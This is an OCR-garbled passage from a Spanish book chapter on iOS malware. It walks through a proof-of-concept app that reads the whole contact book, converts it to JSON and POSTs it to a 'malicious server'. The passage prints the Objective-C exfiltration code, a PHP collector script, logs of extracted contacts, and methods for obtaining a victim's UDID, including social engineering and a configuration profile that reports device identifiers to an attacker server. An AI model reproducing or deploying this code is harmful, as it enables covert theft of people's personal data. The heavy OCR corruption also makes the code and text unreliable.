HS_üg{^^^IniprLfflÍjendo  dictionary  address  book:  %@“,ad[lressBoflk01ct) ; 

f!  Parse  iietinnary  ía  jion  dala,  in  u'ífer  tü  prepare  data  tü  send  it, 
HSOata  ^isonOata 

//  Ifivofee  raetbod  to  sení  data  to  seni'er. 


Imagen  Ü7.14:  Segunda  parte  dcl  eódigo  del  qiLtí  íet:  hi  íigendu  de  contai-ios. 


El  código  coiriienza  iiiicializaiido  las  variables  requeridas,  y  creando  una  instancia  en  la  que  se 
almacena  una  copia  de  toda  la  agenda  tic  con  tac  los,  que  pos  te  ri  oríllente  y  con  bucles  /dr,  se  irá 
recorriendo  y  se  irán  volcando  los  datos  deseados.  En-este  caso,  para  cada  entrada  en  la  agenda,  se 
han  extraído  el  uoiribre,  el  apellido,  todos  los  emaih  asociados  a  una  persona,  y  todos  sus  teléfonos. 
Se  podrían  haber  extraído  más  datos,  pero  como  prueba  tic  concepto  se  considera  suficiente. 

Durante  la  extracción  de  ios  datos,  se  comprueba  la  existencia  de  cada  campti,  es  decir,  que  sea 
distinto  do  nil,  y  en  ese  caso,  se  aliiiaceiia  el  dato  en  uii  diccionario,  ya  que  luego  habrá  que  pasar 
los  datos  al  formato  JSON,  para  su  postor  i  í>r  envío  al  servidor  malicioso,  y  es  que  este  formato 
proporciona  lácilidad  a  la  hora  de  manejar  los  datos,  y  rapidez  a  la  hora  de  transnii tirios. 

Durante  el  código,  existen  varias  líneas  que  utilizan  NSLog,  para  ir  mostrando  por  consola  los 
resultados.  Evidenteincntc  estos  log^  son  para  mostrar  los  resultados  de  la  POC,  pero  se  podrían 
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eliminar  en  un  caso  real.  Los  resultados  por  consola,  muestran  que  los  datos  de  la  agenda  se  están 
extrayendo  correctanieiite,  tal  y  corno  se  puede  apreciar  a  continuación: 


19'24:4€.727  iS4_ni4lMira|9f &ic97j  Status  Autliflrúwll  1 1 
2013-ai-Ll  1Í:^4!46,729  iM_nvilyarfl|996:ee7]  nnvmi  <, m .r  m  > *  i  * im ■  m. m * m*  m  «h* 

2«U-fl-LZ  lt;Z4i46<73t  iE4_iHLrfarfl|mic»7]  Múreos  Book... 

2«13-Bil-Ll  Ifl:  24:4^.738  IM  nalwBrt  1996^^07] 

IA:24:4€.732  lfi4_naluKnÍ«eíca7]  - ENltlY; 

Z013-M-U  tfl¡Z4í4S.733  iW_[iaViíare[flfl®:c»7í  First  [uui«i  Krt# 

2013-91-11  1«; 24; 46. 734  l&4_Mlúar«E946£cB7]  Last  hah:  S«U 

2ffL3-«l-3.1  ia:Z4:46.7£S  iE4_ituiluBrB|99«:c;e7J  EihíI;  kat*-b«ll^G . can 

2013-91— L1  13: 24:46.736  i&4_inalJiaraÍ996:c07|  Enail;  iiMw.crBati.v*-consul'tin9-lnc.cQBi 

2013-il^Ll  li:24:4€.7fis  iS4_nii)lwBra[946:cB7)  Cc^niilaira  phan*:  «»bila-v(SSS)  S64-B5B3 

2013-91-Ll  13:24:46.796  iH_ni8lwar9 [996 j C07 1  CPiT^ilate  phanat  BBÍn-»{4L3»  S53-3Í93 

20X3-B1-I1  lfl;24;4e.766  Í64_lMlMBr«E996íG«7] 

2013-91-11  IÍ3Z4H6.709  ±B4_nuilMiini[99fi:c07]  — - - PHME  EMTBY: 

2813-91-11  19:24:46.77»  i64_ñaüflrá|995:c07j  First  nm;  Panul 
2013-91-11  19:24:46.77»  i&4_inslyiara[996:e07]  Last  Ha»:  Higgíjis 
2013-91-U  lt¡Z4;46.77L  iM_[MlbAini[»9fi:<L47]  Innii:  d-higgúis^c. con 
2013-91-11  19:24:46.772  iS4jnaltfanE996:c07]  Coinplat*  phona:  lkQñÉ-3.5SS-4 71-7 972 
Z013-B1-L1  19:24:40.772  i94_nBli4raÍ999:c07)  CoinpLflta  phnnaí  I»bil«->(40S)  43^-6270 
2B13-91-U  19:24:46.773  i04_inalMrfi[996íC071  C^n^Uta  phflfia:  ímiB  fax->[41B>  SSi-3314 
2013-91-11  19:24:46.773  l64_tiaLyan[99&£c07] 

2013-»1-11  11:24:46.774  i64_iiiBlwira[99e:c07i  — FHME  9NT11Y: 

2013-Bl-U  19:24:46.774  Í64_iiialiAr«[996:i:071  First  nana:  John 

2013-91-U  19:24:46.775  iS4jiuitwan¡99e:c07¡  L«at  aafla:  Appl*s«acl 

2013-91-11  19:24:46.779  iM_[iial.b#ar«[996:c07|  Eaail;  John-ApplwvBil^BE^coa 

2013-91^11  19:24:46.779  164  Mli«r«Í996tc07I  Constata  phana:  nobil<-^e9-55S-S5l2 

2013-91-U  19:24:46.777  i64_iTiBlh«]rv[9a6:c07I  CDuplate  phona:  hDiiB->a&9-S»-L212 

2013-91-11  10:24:46.777  Í64_idali«ra[9g6:c07j 

2913-91-11  19:24:46.779  iM_)iHilwaiie[M6:c07J  THOliE  EMT9Y: 

2013-91-11  10:24:46.779  i64_jiialiiiarB[996:E07)  Pirat  nana:  Amia 

2913-01-Ll  19:24:46.77»  i64  jMlMra[996:c07Í  Last  nana:  Ham 

2913-91-11  19:24:49.77»  i94_sBluara[^96:c07|  Epail:  nnna-Haro^c.eM 

2613-01-11  19:24:46.780  i64  iialwar«[996¡ct7J  Cojnplata  ptianv:  >iEin«->95i-3 22-924 3 

2013-01-11  LB:24:4g.7ei  i&l_aaluara[996:c07l 

2913-01-U  19:24:40.761  Ífi4_aaIuiraE996:c07]  — PMOHE  EHTRY! 

2013-01-U  16:24:46.762  Í64_aBLwaraE99&:c07I  First  rihm:  KgnK 
2613-01-11  16:24:46.762  i64_iMtworaE»§6íe67]  Uat  nw:  Zakroff 
2613-01-11  11:24:49.783  i64jiBlwaraE996]GB71  ípbíIi  hwk-zaki^f  fi^c  .con 
2613^01-11  10: 24: 46. 763  ieo.nalMBraEBSEicO?]  Coaplvta  pbana:  w>orkK'.-l5SS>  766-4823 
2013-01-11  LBí24;46.764  i64_jBilMBjnaf999:c07J  Canplata  phona:  etJi«r-KT07^  SS5-1054 
2013-01-11  19í24í46.784  i64_nalifflreEM6í c073 

2013-01-11  19:24:46.765  Í64_Mllllir«rM6:e6Tl  - PHCm^  EHTflY: 

2013-81-11  19:24:46.768  i64_iia\iflirB[49a:c67I  First  iMPa:  David 
2013-01-11  19-24:46.766  iSOjHlHBra [886 : c07]  Laat  nPiM!  TayUr 
2013-01-11  19:24:46.766  lE4_nB\wBrfl[S»6:e67l  Cfiisplet»  phaaa:  hnn4w.^S5^  16-6978 
2013-01-11  19:24:46.707  Í64_pBlWBra [986 ¡ ci7] 

2013-91-1 L  19:24:46.709  i64_nal.Hiir« [886 : cB?}  Tf=*nifV4i » 4 
2013-01-11  18:24i46.790  i94_iiBlMira  1996:1:07] 


Imagen  07. 1 5:  logs  de  La  app.  CQ  el  que  sc  muestra  la  extracción  de  los  datos  de  la  atienda. 


Decir  que  los  datos  mostrados  en  la  captura  nnlcrior,  han  sido  extraídos  de  un  íFkone  Símuhíof^  por 
lo  que  no  son  reales^  pero  se  ha  hecho  h  prueba  y  ftmeiona  correctaiTieiire  con  un  dispositivo  real, 
frxtrayendo  todos  los  datos  de  los  contactos,  que  por  razones  obvias  no  se  pr^enlan  aquí. 

Al  final  de  este  método,  hay  un  pai  de  líneas  de  código,  que  son  las  que  convierten  los  datos  en  JSON 
\  los  envían  ai  servidor,  invocando  a  im  par  de  métodos  propios,  que  implenientan  dichas  tareas  y 
que  se  presentan  a  continuación  en  más  detaUe. 


Envío  aJ  server 

Para  enviar  los  dalos  al  servidor  malicioso  y  que  este  almacene,  ya  sea  en  fichero  o  en  base  de  datos, 
sodos  los  datos  eximidos  de  la  agenda  de  contactos,  asociados  a  los  identificadorcH  únicos,  para 
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saber  en  todo  momento  de  qué  dispositivo  se  ha  robado  cada  agenda  de  contactos,  lo  primcTo  será 
con  vertir  los  dalos  a  JSON. 

Para  elfo  se  hará  uso  de  alguna  de  las  clases  que  proporciona  el  SDK  de  ¡OS  para  trabajar  con  dicho 
fomiato,  como  es  NSJSONSerializatlon.^  como  se  aprecia  en  la  siguiente  figura: 


i  F^rayind  ipailt  -  ;5Dn  nethodí: 

-  (NSData  Darsea.-DlcclonarioÉnDatCBJSDNí  íW501rt1onary  4;>diccio(rari[iJ5m 

i 

//  Se  crea  une  vble  para  cortrolBr  los  pasibles  erfiares, 

^^a^-toreleasinc}  NSError*  errar  =  nilj 

HSSdtd  TjsíniDátá  -  rNSJSQWSerial-isatiün  datEWxtíTJSílNObitct: diccionario J&ON  optiíMi5:kMiljaptians  errar :&e rror] ¡ 
xf  (errar  !-  nil]  í 
errar  -  nil; 
retiirn  nitj 

error  -  nil; 
return  t^c^iData;; 


Irau-gen  07. !  6:  CóJlgú  del  íüétodo  q\ie  nonvieírt.e  lof;  datos  de  íiiee  ion  ario  a  JSOK. 


Este  iivétodo  siniplemeiite  recoge  por  parámetro  im  diccionario  con  datos,  y  lo  devuelve  serializado 
en  fonnaio  JSOK,  además  alrTiaceiiado  en  tina  estructura  de  tipo  NSDaki,  perfecto  para  transmitirlo 
por  la  red.  Los  datos  que  almacena  el  díceitmario  son  arrays  con  el  conjunto  de  datos  de  cada 
eoiilacto,  a  los  que  se  accede  por  llave,  que  en  este  caso  es  simplemente  un  número  que  actúa  a 
modo  de  índice. 

A  continuación  se  muestra  el  aspecto  que  tiene  el  diccionario  de  daUis,  antes  de  tiansfoimarlo  a 
JSON: 


2&13-91-11  L2i:lB3l9.S4S  i64_miitwflref247Zí £07)  InpriBdflndü  dictionsry  etídress  book:  t 
9  =  ( 

Kbí^, 

Bell, 

kate-bellf  IRA  e .  eos" , 

''WWW .  crfiatiwA-£i3flsultin§-iJic .  ocwn" , 

''lAobile^tSSi)  564-3503'% 

"Min->C415>  555-3695'' 
íf 

1  =  í 

DahíoI f  I 
Higqina, 

d-  hiiggia  5@iinc .  cent" ,  .  __ 

^  hflciA->553-47  B-TG72  ” , 

^  rMÍíile->{4fle)  43&-S2?ft“, 

^'hAKie  fBJE->í4Bfll  555-3534" 

h 

2  =  ( 

jcihiif 

Applefieedf 

Jchn-Appl«£^d^ac .  C'Dn" , 

' '  iwít»ilj0->a  sa-s  5  5-55 12  " , 

'hoinA->S0e-^5-I21Z 

); _ 


IniíiRen  07.1 7:  Aspectn  íle  datos  antes  de  convertirlos  a  í'armatü  JSON  (Farte  1 
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- 3^ - i - 

Ansia, 

Haro, 

"ftñíiB-haro^nflc .  cfin'' , 

“  hcMWB-í^SS5-522-a2  43^' 

); 

4  <=  ( 

Hanl^, 

Eokr&ffí 

*'  ha  nk-zak  rof  f  .  con''  ¡ 
■^work-.i^(555J  yBU-A&23"\ 
"€rtherw>|797i  5S5-1BS4  " 

í  ? 

5  =  i 

David, 

Taylor, 

^'hatri%~^SSS~€U-^13^ 

>J 

> 


lma;íeti  07  J  7;  Aspectci  ds  los  ciatos  atites  de  ooiivKríirlub  a  füimaiü  jyUJN  (TaiíC  2)» 


Cimnáo  se  Im  cjccutsido  cí  métoiio  que  señaliza  y  fraiisíbmiíí  los  datos  a  ISON,  estos  se  aíiiiaceiiaji 
en  la  o^triK tiim NSData^  ios  datos  adquieren  el  aspecto  que  se  muestra  en  la  siguiente  capLuia: 


2&13-ei-Ll  11^51; 43, ^7»  Í6^_[ulwa re [2123:1:97]  Prebenda  vallar  de  jacnData:  <7b223322  3aSb224L  6e9B6122 
Zc224aGl  72Gf222c  22C1G#$6  GlZdGSGl  72Gf4a&il  GlG32efi3  Gf6d222c  ZZ&BBffic  9B2(iaa35  35352fii35  32322433  32343322 

S¿2c223l  223B5b22  44GIG«fi5  GSGc222c  224GG9G7  S76SGe73  Z22c22G4  2dG3fi9G7  fi7G9Ei^3  499dei63  2ee36fid  lilc22fA 

Gt&dBBZíl  3e353S3S  24343739  ZtÍ373S37  32ZZ2c22  edGf62S9  GcGSIZdáe  2334303S  29293433  3SZdlS32  373922Zc  22£B8ftíí 

63293661  73211 3a2  3  34393629  293S3S3S  24333531  34Z254l2c  22342 Z3a  5bZ24g63.  6eeb2Z2c  223B616b  72  Gf 66  66  222c22&3 

GlBefihZri  7a616h72  Gf6fi&C4e  6d6i63Z«  63Sf6d22  2cZ2776f  72£b2E!3«  ZS35353S  29193736  3Gld349S  3233Z2ZC  2Z6f7463 

BS722d3t^  23373Í37  29293635  352^3133  3534225tl  2e223222  3B3b224a  6fBB6«:22  2c2Z4L79  7B&C0S73  G36S641Z  2c2Z4íi6f 

69Be2d41  797961:63  736S9594  406^6163  2eG36f6il  222c2264  6f6Z696c  G52d3«3S  3a3S2d3^  35352435  3S3132ZZ  2:c22CS6f 

WG52d3«  2e39382d  3639352d  31323132  229d2c22  SaUBjtSb  224b6174  GS222c22  426Sec6e  222c22Gb  G174651d  Ú265Gc^z 

466^6163  2«63GfGd  122c2277  77772eG3  72656174  B97fl§32d  636f6EiTl  7SEc7499  GsfiTlde^  fi«63lB63  GfGdZZZe  226dBf£2 

E96c65Zd  3e293535  35292925  3S342d3S  393B3332  2c23GdGÍ  696&2d3a  26143111  29293515  352dll3G  M15223d  2e223322 

3a5b2244  61766964  222c2254  61796cEf  721Z2C22  666^6466  2d3tt3S35  35Zfl3G61  392d3636  373922Sd  7ú^ 


Imagen  Ü7.1S;  Datos  preparados  para  enviar  al  serv  idor  malicioso. 


Uiiü  vez  que  se  tieiieii  los  datos  en  el  Jormalo  enrreoLo  p^ra  su  envío,  se  invoca  a  otro  método  al 
puc  se  le  pasan  dichos  datos  por  parámetro,  y  es  este  método  el  que  establece  una  conexión  cotí 
el  servidor  y  envía  los  datos.  En  la  imagen  06.19  de  la  página  siguiente  se  muestra  el  código  del 
mcLodo  de  envío^  llamado  sejidDaía'. 


Fsíe  método  crea  una  conexión  con  el  servidor  remoto  malicioso,  que  en  este  caso,  y  corno  prueba 
de  concepto,  es  la  propia  nmquiiia  en  la  que  se  está  desarRíllando  la  POC,  que  es  un  MacBook  Pw, 
en  el  que  está  instalado  el  entorno  de  desarrollo  tOS  (Xcodé),  y  un  5er\idor  AMMP  Fw  para  alojar 
[a  aplicación  web.  Por  Tanto  la  conexión  apunta  a  localhost,  pero  podría  apuntai  a  la  URL  deseada. 

Para  crear  la  conexión  existen  multitud  de  opciones  diferentes,  fniTncworks,  APIs,  clases  óe  Apple 
o  de  terceros,  opensouree,  de  pago,  etcétera.  En  este  caso  se  ha  utilizado  la  clásica  clase  de  Apple 
NSURLConnection,  a  la  qne  basta  con  pasarle  un  request  previamente  configurado,  precisanicotc 
lo  que  se  hace  es  configurar  los  diferentes  paránielros  de  diclií)  como  puede  ser  el  tipo  de 

petición  o  envío  (en  este  caso  es  por  POS T),  concatenar  los  datos  con  el  parámetro,  indicar  el  tamaño 
de  los  daros  a  envían  el  tipo  de  codificación  (UTF-8),  etcétera. 
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—  tmid}  v^dataTaSend  { 

//  C reate  server  ÜHL. 

NSUHL  -wyUftL  =  [fiSURL  URLWithSt  riafl  :^http://127.fl.  i-i:  eBS»/addreislJüDk/iiitíeí!.  prtip7"J ; 

//  Créate  reqgest. 

NSMut  ah  lelilí  LRe  que  st  ^rfquest  =  iNSMotaaleURLííeq  Jtst  ree|uestWlthURL;  nyimL 

c  a  E±ie  Pü  licy  i  hJSllftLReques  tUseP  ratoeolCa  chePat  icy 
t  inteo  u  t  X  n  te  rva  l :  Ee.  J ; 

//  CoTí-^igurE  reqLBSt^ 

[  reqgest  setWTTTWel-hod  íCPOST*]  í 

/ISStrlng,  mparanString  -  g^'partin-'  í 

JJSSt  rlpiq.  mf  BQfi^trifiq  ^  lENSStrinq.  aUod  ÍJiltWithflataiiíataTDSenEl  Sflcodipg-NSlfTFBStririgEncOííing]  j 
IfeStfinq-  *  íMstStrirg  =  [parai^tring  itríngByfliPpefidingSt  rinqí  jiwtSt  riagj;  ^ 

[request  m tva lúe :  [NSSt rjji{^ i  s t riqflW Ltfí F& mat ; ,  [poststryig  Icrigthll  fortfTTPKeadtrFiel(i:<|"Gontent-lEngth”]  í 
[request  fietHllPBodv:  tposlString  dataUsxngErcDflingili^TFaSTriiigErcQdliig]!; 

//  Creóte  cannectLar  with  tanflgyrEd  rtquest. 

NKüftiCnnnection  «ronncctlon,-  [[NSURlCcwrtloa  alloc]  in ItWlthftequ es t!  renques t  delaqateiSElf] ; 

//  Etart  coinnrettan. 

[connectljjn  startlí 

//  Chetk  i1  connetlion  has  been  treated. 
it  (connectljinJ  { 

NSLog  (<!"  Cfinnect  ion  created  s  ucees  s  f  ul  1  y  M  !  **  J ; 

2 _ 

Imagen  07.19:  Aspecto  dcl  mciodo  de  envío  de  datos  al  server  malicioso. 

Una  vez  que  la  petición  está  configurada,  basta  con  arrancar  la  conexión,  pasándole  dicho  rÉíquéLs% 
y  a  fuocioDar.  EvidcnLcmentc  se  pueden  i mpl ementar  muchisimas  cosas  más,  como  realizar 
comprobación  del  correcto  establecimiento  de  la  conexión,  o  incluso  recibir  comunicaciones  del 
serv'idor,  ya  que  en  este  caso  la  connuiicación  es  luiidircccionaL  Pero  se  podría  implemeiitar  algo 
mucho  más  complejo,  que  permitiese  tener  eicrlo  control  sobre  el  dispositivo  a  modo  troyano.  En 
este  caso  y  teniendo  eo  cuenta  que  es  una  prueba  de  concepto,  se  ha  implementado  de  la  manera 
más  sencilla  posible,  simplemente  para  demostrar  qué  se  puede  hacer  para  hachear  un  disposilivu  y 
robar  algunos  datos. 


Server  Side 

I 

Por  ultimo,  falta  por  ver  cómo  es  el  código  necesario  en  el  ser\idor,  para  que  se  recojan  los 
datos  enviados  por  el  dispositivo  al  que  se  le  ha  instalado  el  mahvaiv.  En  este  caso,  se  ha  elegido 
como  lenguaje  de  programación  PHP,  ya  que  como  senador  se  está  utilizando  A4AMP  Pm  con  su 
correspondiente  FIÍPMyAdmirt^  que  es  opemource^  e  ideal  para  hacer  pruebas. 

El  lado  del  seixádor  se  ha  implementado,  ai  igual  que  la  upp  cliente,  de  la  manera  más  sencilla 
posible,  y  consiste  simplemente  en  un  fichero  PH?  que  recoge  lo  que  el  dispositivo  inrectado  envía, 
en  cuanto  el  malware  se  ejecute,  y  lo  almacena  en  un  fichero  de  texto,  A  continuación  se  muestra 
el  código  del  fichero  que  recoge  los  datos,  llamado  index.php^  y  que  como  PoC,  ptwjif  ofconcepí, 
simpl emente  recoge  y  almacena  Itís  datos  en  un  fichero: 
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<7php 

Échb  web  es  fura  rairibii^  tfi^Éisdas  de  coritoctras  de  ios. 

//  POST] 

SAítí^st  -=  S_PüSTt*pdríafi‘3; 

//  Wrtti^  file 

f i  l  e_íHít^cafiteist  s  C  “diítopost.  ^  txt ' »  Sddtopost  J : 
li _ 

Tmaeer  0'7.20:  Códip^o  del  servidor nn al que  reccíiíe  Ins  dato^i  enviados  por  el  diRpnsifivo  TO^ff  iTifectado. 


El  aspecto  del  fichero  generado  es  ei  siguiente: 

K\“3\":  l\“Anna\'',\>'HarciV',\“anna-harogiiiac.coni\",\“hoiie->-SFi'i-S3:2-B243\"l. 

:  [\“Daniel\*‘ ,  \  "Higgin£\“  A'^d-higginsgmac,  com\^*  p\‘^hoiifr->5Syi— 47R-7fiT?\^' , 
\^iiobile->C40a]  43i-5270\'‘,\“hoine  fasc->í408í  555-3514\“]  A'’4\‘*:  [\‘'nank\'^ 

A“l^ank-zakrDff@rnac,  cm\^ ,  \"'wDrk->(555)  76S-4823\"  ,\'^óthér->(707) 
555-1B54V]  ,\^2y‘:  \*'Ap pióse ed\ ^A*' dcbn-flppl 65 ft^ri$;T\3C .  coiTí\^\ 

\^’nDbil&-^:i-SEB-555-5512\“  A^^hofno->^efi9-555-1212\^]  ,y'ññ\l\^  , 

\“kate-bell^ac.  CQn\*^  cr^ative-consulting-inc.  cqüiV*'  p\'^niobile-i'f  555} 

564-a5a3\"  p  \"'main->í415 )  555--3695\‘*]  . \^5V' :  [\“DavÍ£i\^  p  A^Taylo  r\”  p  home- 
>555-B10-6679\"3} 


Imagen  07,21 :  Aspecto  de  los  datos  recibidos  en  el  servidor  nuilicioso. 


Evidentemente,  en  caso  de  querer  implementar  ei  malware  de  manera  real,  habría  que  implementai'  üii 
sistema  ini  poco  más  complejo  que,  recogiese  dalos  enviados  por  diferentes  dispositivos  iTifecUidos, 
y  los  almacenase  en  lugar  de  en  un  fichero,  en  ima  base  de  datos.  Además  habría  que  parsear  los 
datos  JSÜN  recibidos,  y  clasificarlos  para  organizarlos  en  las  tablas  de  la  base  de  datos,  y  poder 
lealizar  consultas  de  manera  cómoda. 


Distribución  del  malware 

Creación  y  distribución  del  Perfil  de  Contiguradón  que  roba  UDID 

Para  la  distiibución  del  malware:  habrá  que  conocer  el  IJDTD  de  la  victima,  para  Iíj  cual  qui/As  sea 
necesario  un  poco  de  ingeniería  social.  Ahora  se  van  a  indicar  varios  lugares  en  donde  se  puede 
consultar  dicha  información,  siempi-e  y  cuando  se  renga  acceso.  El  primer  lugar  en  donde  se  puede 
mliar  el  UDID  es  en  ¡Tunes,  una  vez  que  está  conectado  el  dispositivo.  Basta  con  hacer  clic  sobre  el 
numero  de  serie  y  aparece  el  UDID,  tal  y  como  se  aprecia  en  la  srgiiierte  captura: 


Tmagsn  07.22:  UDID  en  iTune¿i. 
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Ademán  íTunes  hace  hackup  por  defecto  de  los  dispositivos  que  se  conectan,  de  Tnancra  qne  crea  mía 
caipeta  por  cada  dispositivo,  en  donde  aloja  didia  copía  de  segundad.  La  carpeta  tiene  de  nombre 
eí  UDID  de  cada  dispositi%^o,  por  lo  que  a  confín  nación  kc  inucsLrari  rutas  del  bückup  de  ¡Junes  en 
varios  sistemas  ope  rali  vos: 

-  /  Windows  Vfst&/7}:  C*  i  i Isers \(usuarío)  ^AppData \Roaming'^Apple  Compitter \Mobi I 
Ba€kup\ 

-  [Windows  XPJ:  C.'iDociments  cmd  Sertmgs\(usernúmej\Apph^^^^^^  Duld Apple 

CompmerWobUeSync  \Backup  \ 

-  [Mac  OS  XJ:  -/Zibrafy/Appikaílon  Supporr/MobüeSyiic/BücAip^^ 

Por  otra  parte,  los  desarrolladiires  suelen  gestionar  los  dispositivos  en  los  que  dcsamíllan,  en 
Organ¿zer\  mía  aplicación  dentro  del  eniomo  de  desarrollo  Xcode,  Esta  opción  es  interesante  ya 
que  si  el  dcsarrolladoi  tiene  los  certificados  de  desarrollo  incluidos  en  Xcode,  cuando  se  conecta 
un  nuevo  dispositivo,  aparece  un  bolón  de  Use  [br  Dcvelopmem^  con  el  que  con  ur  solo  clic  el 
dispositivo  en  cuestión  se  añadirá  a  ios  Ptmnsianlng  Proftles  de  desarrollo  que  baya  en  dicho 
De  es  La  niaiiei  a  si  se  tiene  el  dispositivo  sin  el  passeode^  en  unos  segundos  se  podría  capturar  el 
UDID  con  solo  parearlo  con  Organizer. 


Imagen  07.23:  Botón  UseforDevehpnieJii  en  de  Xcodr^, 


Además  de  íTunes  y  óeXcode,  se  puede  consuliar  el  UDID,  así  como  otra  infomiación  acerca  de 
los  dispositivos  en  la  Uiiiidad  de  Configuración  de.  iPhone  (iPhone  Configuraron  Uíility  o  iPCU), 
que  es  un  software  proporcionado  por  Apple  de  manera  gratuita  para  gestionar  pequeñas  íloLas  de 
dispositivos  (hasta  dÜ  iDsvices)  en  colegios,  bibliotecas  o  pequeñas  empresas.  A  continuación  se 
muestra  una  captum  de  dicha  aplicación  con  los  dispositivos  asociados  que  tiene: 


Imagen  [)7.24:  Aspecto  de  iPCU  cem  Iüü  UDID  de  los  dispositivos  ssocíííiIos. 
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En  la  parte  de  abajo  tle  la  aplicación,  se  puede  apreciar  como  aparecen  varias  pestañas,  cutre  las 
tjLic  destaca  la  de  perfiles  de  datos,  que  como  se  lia  indicado  auterformente  son  los  qi;e  permiten 
instalar  app3  en  los  dispositivos,  y  en  este  cas^o  se  listar  todos  los  que  hay  instalados  en  el  dispositivo 
conectado, 


Pero  todas  estas  fonrias  de  averiguarlo,  están  muy  bien  cuando  se  Lieue  cerca  a  la  victima,  y  se  le 
puede  quitar  el  dispositivo  diiiante  algunos  niiiiuLos,  pero  en  caso  de  que  no  haya  acceso  íisíco  al 
dispositivo,  la  cosa  se  complica,  así  que  ¿qué  opciones  quedan? 


Todavía  se  puede  hacer  algo  rnás  para  obtener  el  UDID  sin  acceso  nsioo,  y  consiste  en  utilizar 
un  Perfil  de  Conñgnt'ación  {Configuraiítm  Prafih)^  íle  la  misma  manera  que  hace  la  web  hííp:// 
wkathTnyudkicorrd  la  que  el  usuario  accede  a  dicha  web  con  mi  dispositivo  iOS,  descarga  e 
ifisLala  ur  perfil  de  configuración  especifico,  que  permite  que  el  dispositivo  envíe  su  LÜJÜ  a  un 
servudon  y  se  le  miiestm  al  usuario  en  la  propia  pantalla  del  dispositivo  iOlI,  como  se  aprecia  en  la 
captura: 


Pero,  ¿Cómo  utiliza  esta  \veb  los  peifiles  de  con  figuración?  T-a  idea  es  utilizar  todo  el  sistema  de 
perfiles  que  proporciona  Apple  para  implementar  la  gestión  y  despliegue  a  nivel  corporativo  de 
dispüsiLívtJs  iOS. 


A  continuación  se  muestra  dicha  tabla  titulada  Commamf  LLd¿?ig: 
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Control  CDmmands 

»  Devíce  Lock 

-  Erase  Device 

-  Clear  Passeoda 

Device  Queries 

«  Sficurlty  Information 

*  Installed  Applicaítion  Ust 

*  Devicie  Information 

*  Certifícate  List 

*  Proflle  List 

-  Pravisiontng  Proflle  Ust 
►  ReslTÉCtíons  List 

Device 

Confíguration 

-  Instan  Profile 

*  Remove  Profile 

•  Instan  Píovísioning  Pmfile 

■  Remove  Provisioning  Profile 

Dflvics  tD  Server 
Commands 

-  Autlrónticate 

-  Token  UpdMe 

Imagen  07.26:  Tabla  Command  Llstmg  mn  las  opeiañcs  del  protocolo  JvlDM. 


Una  ve/  que  su  han  adquirida  algunas  TiíMjioues  básicas  sobre  el  tenia  es  muy  fácil  cieai  un  perfil 
de  configuración  que  solicite  cierta  información  acerca  de  nn  dispositivo  iOSf,  como  puctíen  ser  el 
ideiitificador  único  de  dispositivo  o  UDID^  las  direcciones  MAC  de  Wi-Fi  o  de  Bluetooth^  versión 
del  software,  n Limero  de  teléfono^  modelo  y  número^  tiutiicto  tic  serie,  etcétera. 

Para  ver  en  detalle  qué  infomiación  se  puede  solicitar  a  un  iDevice  con  un  perfil,  se  puede  consultar 
una  tabla  en  la  que  aparecen  Ludas  las  posibles  peticiones  o  que  ríes  que  se  pueden  realizai'  sobre  el 
dispositivo.  A  continuación  se  muestra  dicha  tabla: 


HequestType 

D  evícetnfo  rmatí  ün 

Queries 

(array  of  St  rings): 

"AvailabieDeviceCapacity",  "BíueíootInMAC", 

"B  ai  Id  Versión ",  ”Ca  rrísrSeltings  Vers  ion", 
"CurrTentCarierNQtwoiItL  T:urfertMCC", 

"C  u  rre  nM  NC  ' , "  DataRoarr  ing  Enabled" , 
"DewceCapacrtyL  "  DeviceName",  "ICCIff', 

“IME1'\  “IsRoaming",  “ModeP,  "ModelName", 
"ModBmFírmwareVersionL  ■H^SVersíon", 
"PhoneNumbai^^  '’PrDducP,  "ProduciName*, 
"SiMCarrierNetwofkU  "SIMMCC". 

"SeríaíNümbeA  “UDID  ",  "WiRMACL  “UDID'’ 

[iiiagíiv  07.27:  Taifa  non  toilfi  la  mfoimaciÓF:  qtifí  íe  piiede  ñolicitaraiín  dispnftitívo  IOS  con  un  perfil  de  cünítguraciím.. 


Una  vez  sentadas  las  bases,  se  da  paso  a  mostrar  el  perfil  de  configuración  que  se  ha  creadíí  para  que 
cuando  sea  instalado  en  un  dispositivo  iOS^  este  envíe  el  identiñeador  único  de  dispositivo  o  UDlü 
al  servidor  que  aloja  dicho  perfil.  FJ  UDÍD  corno  se  ha  visto  anteri oríllente  es  necesario,  para  creai 
un  perfil  de  datos  que  permita  la  instalación  del  malware  de  la  pmeba  de  concepto,  cu  el  dispositiv(3 
víctima. 


147 


Capítulo  Vil,  Malware  en  ¿OS 


A  cofitiiiuaciÓTi  wc  presente  el  perfil  de  configuración,  que  es  un  fichero  con  extensión  .mobíleconfig 
creado: 


ir«rsióri=''l,0"  Encuiing=“UTF-a''7» 

<!DD(rTYPE  plist  puaijrc  '^^/MppLe//DTU  PLIST  1.§//EN‘'  ^http://www*apple.  CíWi/DTfis/PrcMrt  y  Listel, 

'Jt  e  5^  Pa  y  1  oad  Co  n  tent’í  /  kc  y> 

<dict^ 

€5t  rlntivfií  tB :  //ISZaSB,  1.  E  s  aSBfi/retriewe.  pn|5</«  rini> 

<  ke  y  >0e  V  ic  e  A 1 1  r  ibut  «s  </ k  ey^ 

’^arrayi* 

t  r  In  g>]Jül  t  rlng> 

ring>IHE  t  rings 

« I:  rlngs^TCC  tD</st 
-íSt  ring>VEilSION^/st  ring> 

<5 1  ringspilí]  QUCT</  s  c  r  ii^gs 
^/arrays 
</dict> 

^  ke  y>P  ay  lo  a  dü  rg  b  ii  iz  a  ti  or  </  ke  y> 

ring>www.  i  ñf  ma  t  ic  aE  4 .  coi)</ 1 1  rl  ñus 
<íüey>Pay  loadDis  alayManr^ 

■tsTrlng5.iM  Prefile  5eníice</5t  rings 
key^Pay  loa  ilVe  r  í-io  n  Vkeys 
*  1  ritegi?r>l’e/integflr> 

<key  sP  d  jr  I  oa  dl^UI  keys 

'  i  ags  igpo  r  ad’t /st  r  in  gs 
<key>Faylod  Jldentif  ie  r^/keys 

« t ringshttp  1  //192. 168 .1.6:  BB3B/  ret  rie ve .  php</st  rings 
^key^PayloadCesc  ript  inn</kr  y> 

^strlngsTkis  teuporary  profLle  will  bs  used  to  find  and  aisplay  your  current  devicE's,  UBtG.</5t riniis 
<K2y>Pa yloa dT/pe^/ keys 
<ístring>Profile  Se  rvic€</st  rings 
^/diets 
</plists 


